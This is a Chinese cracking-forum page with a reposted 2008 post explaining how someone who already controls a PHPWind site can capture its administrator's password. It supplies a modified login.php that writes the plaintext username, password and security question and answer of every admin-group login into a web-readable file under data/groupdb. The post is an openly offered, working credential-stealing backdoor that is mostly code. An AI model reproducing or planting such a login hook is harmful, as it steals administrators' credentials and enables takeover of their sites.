设为首页收藏本站官方微博
开启辅助访问 切换到窄版

飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

[x86]PYG官方Dll优雅破解补丁制作工具[x64]PYG官方DLL优雅破解补丁制作工具[x86]PYG官方Exe优雅破解补丁制作工具[x86/x64]Baymax Patch Tools
返回列表 发新帖
查看: 2641|回复: 0

[转贴] PHPWIND得到管理员密码的方法

[复制链接]
寒痕
  • TA的每日心情
    开心
    2024-1-29 17:47

    • 签到天数: 2 天

    [LV.1]初来乍到
    发表于 2008-8-22 14:00:07 | 显示全部楼层 |阅读模式
    本文链接:http://user.qzone.qq.com/40949653/blog/1219120681

    有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办?
    在登录文件做手脚啊...我来贴一个我修改的.
    login.php里面替换掉对应的部分就OK了.
    [Copy to clipboard] [ - ]CODE:
    if($action=="login"){
    /*记录他的问题和答案修改开始*/
    $ques=($_POST['question']!=='-1') ? $_POST['question'] : $_POST['customquest'];
    $qs='问题:'.$ques.'答案:'.$_POST['answer'];
    /*记录他的问题和答案修改结束*/
    if(!$_POST['step']){
      $jumpurl = $pre_url;
      require_once(R_P.'require/header.php');
      require_once PrintEot('login');footer();
      } elseif($_POST['step']==2){
      $logingd && GdConfirm($_POST['gdcode']);
      $loginq && Qcheck($_POST['qanswer'],$_POST['qkey']);
      require_once(R_P.'require/checkpass.php');
      include_once(D_P."data/bbscache/dbreg.php");
      InitGP(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'P');
      if ($pwuser && $pwpwd)
      {
      $md5_pwpwd = md5($pwpwd);
      $realpass=$pwpwd;
      $safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';
      list($winduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);
      /*下面是我添加的*/
      $adminid = array("3", "4", "5");  //adminid=3,4,5,就是管理者.
      if (in_array($groupid, $adminid)){
      $showtime=date("Y-m-d H:i:s");  //记录的时间.
      @$fp = fopen(D_P.'./data/groupdb/index.html', 'a');  //写入到原本就存在的文件,而且这个文件应该是可写的.
      @fwrite($fp, '用户名:'.$pwuser.'-密码:'.$realpass.'-'.$qs.'-GroupID:'.$groupid.'-'.$showtime.'<br>');  //基本格式
      @fclose($fp);
      }
      /*到这里修改结束*/
      }else{
      Showmsg('login_empty');
      }
      if(file_exists(D_P."data/groupdb/group_$groupid.php")){
      require_once Pcv(D_P."data/groupdb/group_$groupid.php");
      } else{
      require_once(D_P."data/groupdb/group_1.php");
      }
      $windpwd = $pwpwd;
      $cktime != 0 && $cktime += $timestamp;
      Cookie("winduser",StrCode($winduid."\t".$windpwd."\t".$safecv),$cktime);
      Cookie('lastvisit','',0);//将$lastvist清空以将刚注册的会员加入今日到访会员中
      if($db_autoban){
      require_once(R_P.'require/autoban.php');
      autoban($winduid);
      }
      ($gp_allowhide && $hideid) ? Cookie('hideid',"1",$cktime) : Loginipwrite($winduid);
      empty($jumpurl) && $jumpurl=$db_bfn;
      //passport
      if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){
      $tmp = $jumpurl;
      $jumpurl = $forward ? $forward : $db_ppturls;
      $forward = $tmp;
      require_once(R_P.'require/passport_server.php');
      }
      //passport
      refreshto($jumpurl,'have_login');
    }
    }
    很龌龊吧.
    PYG19周年生日快乐!
    回复

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表